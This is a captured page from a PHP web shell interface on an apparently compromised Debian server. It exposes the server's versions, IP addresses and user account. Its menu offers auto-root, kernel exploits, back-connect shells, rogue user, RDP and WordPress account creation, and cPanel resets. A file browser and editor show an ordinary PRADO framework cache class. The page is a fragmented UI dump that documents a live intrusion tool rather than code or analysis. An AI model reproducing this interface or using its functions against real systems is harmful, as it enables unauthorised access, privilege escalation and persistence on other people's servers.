Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.117.145.41
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
framework /
Data /
SqlMap /
DataMapper /
[ HOME SHELL ]
Name
Size
Permission
Action
TFastSqlMapApplicationCache.ph...
1.92
KB
-rw-r--r--
TLazyLoadList.php
4.17
KB
-rw-r--r--
TPropertyAccess.php
4.14
KB
-rw-r--r--
TSqlMapCache.php
6.42
KB
-rw-r--r--
TSqlMapException.php
2.5
KB
-rw-r--r--
TSqlMapPagedList.php
5.54
KB
-rw-r--r--
TSqlMapTypeHandlerRegistry.php
4.98
KB
-rw-r--r--
messages.txt
4.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TFastSqlMapApplicationCache.php
<?php /** * TFastSqlMapApplicationCache class file contains Fast SqlMap cache implementation. * * @author Berczi Gabor <gabor.berczi@devworx.hu> * @link http://www.pradosoft.com/ * @copyright Copyright © 2005-2014 PradoSoft * @license http://www.pradosoft.com/license/ * @package System.Data.SqlMap */ /** * TFastSqlMapApplicationCache class file * * Fast SqlMap result cache class with minimal-concurrency get/set and atomic flush operations * * @author Berczi Gabor <gabor.berczi@devworx.hu> * @package System.Data.SqlMap * @since 3.2 */ class TFastSqlMapApplicationCache implements ICache { protected $_cacheModel=null; protected $_cache=null; public function __construct($cacheModel=null) { $this->_cacheModel = $cacheModel; } protected function getBaseKeyKeyName() { return 'SqlMapCacheBaseKey::'.$this->_cacheModel->getId(); } protected function getBaseKey() { $cache = $this->getCache(); $keyname = $this->getBaseKeyKeyName(); $basekey = $cache->get($keyname); if (!$basekey) { $basekey = DxUtil::generateRandomHash(8); $cache->set($keyname,$basekey); } return $basekey; } protected function getCacheKey($key) { return $this->getBaseKey().'###'.$key; } public function delete($key) { $this->getCache()->delete($this->getCacheKey($key)); } public function flush() { $this->getCache()->delete($this->getBaseKeyKeyName()); } public function get($key) { $result = $this->getCache()->get($this->getCacheKey($key)); return $result === false ? null : $result; } public function set($key, $value,$expire=0,$dependency=null) { $this->getCache()->set($this->getCacheKey($key), $value, $expire,$dependency); } protected function getCache() { if (!$this->_cache) $this->_cache = Prado::getApplication()->getCache(); return $this->_cache; } public function add($id,$value,$expire=0,$dependency=null) { throw new TSqlMapException('sqlmap_use_set_to_store_cache'); } }
Close